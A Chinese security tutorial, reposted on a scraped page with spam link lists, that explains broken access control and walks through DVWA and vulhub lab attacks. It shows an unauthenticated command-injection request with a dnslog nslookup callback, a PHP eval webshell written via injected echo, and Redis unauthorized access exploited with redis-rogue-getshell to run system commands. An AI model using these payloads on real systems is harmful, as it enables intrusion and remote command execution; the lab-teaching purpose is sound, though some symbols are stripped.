当前位置: 首页 > news >正文

企业做网站哪个最好wordpress content.php

企业做网站哪个最好,wordpress content.php,百度云wordpress,网站被攻击了怎么处理文章目录 1、失效的访问控制1.1、OWASP Top 101.1.1、A5:2017-Broken Access Control1.1.2、A01:2021 – Broken Access Control 1.2、失效的访问控制类别1.2.1、水平越权1.2.2、垂直越权 1.3、攻防案例1.3.1、Pikachu靶场 Over Permision1.3.2、DVWA越权利用失效的访问控制漏洞… 文章目录 1、失效的访问控制1.1、OWASP Top 101.1.1、A5:2017-Broken Access Control1.1.2、A01:2021 – Broken Access Control 1.2、失效的访问控制类别1.2.1、水平越权1.2.2、垂直越权 1.3、攻防案例1.3.1、Pikachu靶场 Over Permision1.3.2、DVWA越权利用失效的访问控制漏洞执行命令注入利用失效的访问控制漏洞写一个webshell尝试蚁剑连接 1.4、相关漏洞1.4.1、目录遍历1.4.2、未授权访问 2、未授权访问2.1、Redis未授权访问2.1.1、Redis介绍2.1.2、Redis简单使用2.1.3、Redis未授权访问2.1.4、Redis未授权访问执行系统命令漏洞复现 1、失效的访问控制 应该对Web 应用系统等实施访问控制策略限定不同用户的不同权限访问范围。如果没控制住就意味着访问控制失效。 1.1、OWASP Top 10 1.1.1、A5:2017-Broken Access Control A5:2017-Broken Access Control 未对通过身份验证的用户实施恰当的访问控制。攻击者可以利用这些缺陷访问未经授权的功能或数据例如访问其他用户的帐户、查看敏感文件、修改其他用户的数据、更改访问权限等。 1.1.2、A01:2021 – Broken Access Control A01:2021 – Broken Access Control 访问控制强制实施策略使用户无法在其预期权限之外进行操作。失败的访问控制通常会导致未经授权的信息泄露、修改或销毁所有数据、或在用户权限之外执行业务功能。 1.2、失效的访问控制类别 权限移动方向 1.2.1、水平越权 在同级别账户中横向移动 就是同级用户之间的越权打个比方现在有ABC三个用户A是管理员BC都是普通用户现在B能够使用C这个用户的权限这就是水平越权 1.2.2、垂直越权 普通用户获取管理员权限 通过低级权限跨越到高级权限用高级权限干高级权限的事情来我们继续打比方A是超级管理员,BC是普通用户现在这个B啊通过了某些手段跨越获得了A超级管理员的权限这就是垂直越权垂直越权的特点就是以低级权限向高级权限跨越 1.3、攻防案例 1.3.1、Pikachu靶场 Over Permision Pikachu靶场 Over Permision 1.3.2、DVWA越权 利用失效的访问控制漏洞执行命令注入 先在正常登录的情况下BurpSuite抓取Command Injection关卡的Low级别 然后点击Logout退出登录 实现在不登录DVWA靶场的情况下访问靶场里面 Command Injection关卡的Low级别 路径vulnerabilities\exec\source 浏览器访问low.php 通过访问http://192.168.80.139/DVWA-2.0.1/vulnerabilities/exec/source/low.php 得到如下界面 BurpSuite抓取数据包发送到Repeater模块 改变数据包的请求方式在源码中可以得知是通过POST方式提交的 添加请求体内容ip127.0.0.1SubmitSubmit 使用实现命令拼接做命令注入 需要做URL编码防止跟连接Submit的发生冲突 BurpSuite中选中按Ctrlu即可实现uRL编码 发现使用whoami命令并没有回显 然后使用calc尝试调出计算器 命令执行成功 说明页面没有回显并不能代表命令执行没有成功 可以利用dnslog平台测试命令是否执行成功 r 然后使用nslookup进行域名 解析ip127.0.0.1%26nslookuphv1co0.dnslog.cnSubmitSubmit 点击Send发送来到dnslog平台点击Refresh Record刷新记录 解析到了说明命令执行成功 利用失效的访问控制漏洞写一个webshell尝试蚁剑连接 echo ?php eval($_REQUEST[6868])? shell.php 按Ctrlu做url编码 得到echo%3fphp%40eval($_REQUEST[6868])%3fshell.php POST /DVWA-2.0.1/vulnerabilities/exec/source/low.php HTTP/1.1 Host: 192.168.80.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 86ip127.0.0.1%26echo%3fphp%40eval($_REQUEST[6868])%3fshell.phpSubmitSubmit访问http://192.168.80.139/DVWA-2.0.1/vulnerabilities/exec/source/查看是否成功 访问shell.php 蚁剑 连接 http://192.168.80.139/DVWA-2.0.1/vulnerabilities/exec/source/shell.php 1.4、相关漏洞 1.4.1、目录遍历 目录穿越目录遍历Directory TraversalWeb 用户通过某种方式可以访问Web 根目录以外的文件甚至执行系统命令。 造成目录遍历漏洞的原因 文件包含文件读取RCE… 1.4.2、未授权访问 未授权访问Unauthorized Access重要资产根本没有做访问控制限制导致黑客攻击者可以在没有授权的情况下操作重要资产包括读写文件执行命令等敏感操作 2、未授权访问 2.1、Redis未授权访问 2.1.1、Redis介绍 Redis 是非关系型数据库系统没有库表列的逻辑结构仅仅以键值对的方式存储数据 Redis 数据库经常用于Web 应用的缓存 Redis 可以与文件系统进行交互 Redis 监听TCP/6379 2.1.2、Redis简单使用 博客 跳转 Redis 未设置密码客户端工具可以直接链接 ┌──(ajestzh-CN)-[~/vulhub/vulhub/redis/4-unacc] └─$ redis-cli -h 127.0.0.1 127.0.0.1:6379 set name JayChou OK 127.0.0.1:6379 get name JayChou 127.0.0.1:6379 config set dir /tmp/ OK 127.0.0.1:6379 config set dbfilename jaychou.txt OK 127.0.0.1:6379 save OK 127.0.0.1:63792.1.3、Redis未授权访问 读取数据库内容读取系统文件执行系统命令信息泄露直接写WebShell计划任务反弹ShellSSH免密登录…redis-rogue-getshell 2.1.4、Redis未授权访问执行系统命令漏洞复现 环境/vulhub/vulhub/redis/4-unacc docker-compose up -d启动环境后连接redis客户端 无密码直接连接成功 ┌──(kali㉿kali)-[~/Vulnerability-library/vulhub/redis/4-unacc] └─$ redis-cli -h 127.0.0.1 127.0.0.1:6379 info # Server redis_version:4.0.14 redis_git_sha1:00000000 redis_git_dirty:0 redis_build_id:3914f9509eb3b682 redis_mode:standalone os:Linux 6.1.0-kali9-amd64 x86_64 ....... .......从 github上把redis-rogue-getshell这个项目克隆下来 第一步 cd redis-rogue-getshell/RedisModulesSDK/ make会生成一个exp.so文件编译时会报错不影响我们操作 cd ../ python3 redis-master.py -r 127.0.0.1 -p 6379 -L 192.168.80.141 -P 8888 -f RedisModulesSDK/exp.so -c id执行id命令 执行其他命令 python3 redis-master.py -r 127.0.0.1 -p 6379 -L 192.168.80.141 -P 8888 -f RedisModulesSDK/exp.so -c whoami
http://www.sadfv.cn/news/166664/

相关文章:

  • 明年做啥网站致富网站突然被降权
  • 哪个网站可以做免费推广上海出啥大事了今天
  • 程序员做的简单的网站外贸营销型网站建设平台
  • 请问怎么做网站海口网站建设网站制作
  • 重庆网站建设帝维科技vps和云服务器区别
  • 陕西网站建设企业学编程多少钱学费
  • 做淘宝优惠网站wordpress照片exif
  • 手机网站自适应宽度wordpress上传主题没图片
  • 做网站做推广wordpress默认缩略图
  • 广州市律师网站建设价格seo优化顾问
  • 桂平逗乐游戏招聘网站开发青岛建设银行官方网站
  • 网站没有备案会被降权吗十大看免费行情的软件下载大全
  • 网站开发技术职责忻州 建网站
  • 买完网站怎么建设wordpress如何加插件
  • 微信做单网站有哪些怀柔高端网站建设
  • 网站开发技术方法与路线做网站凡科
  • 易企网站建设网站添加后台
  • 做汽车特卖会的网站济南网站建设开发公司
  • 微信小程序网站建设深圳连夜推出“硬核”举措
  • 做个网站的费用家用电器行业外贸建站
  • 网站建设的设立方式六安百度推广公司
  • 年前做网站的好处好看的手机网站模板免费下载
  • 宝塔如何添加ip域名做网站想自己做网站吗
  • 金华网站制作系统wordpress template_include
  • 成都市高新区规划建设局网站设计师招聘
  • 人才市场网站建设论文查看本分行
  • 山东滕州做网站技术电话html企业网站源码下载
  • 云南放心seo整站优化百度最新版本2022
  • 音乐网站建立广州品牌网站建设
  • 手机网站开发怎么收费wordpress文件调用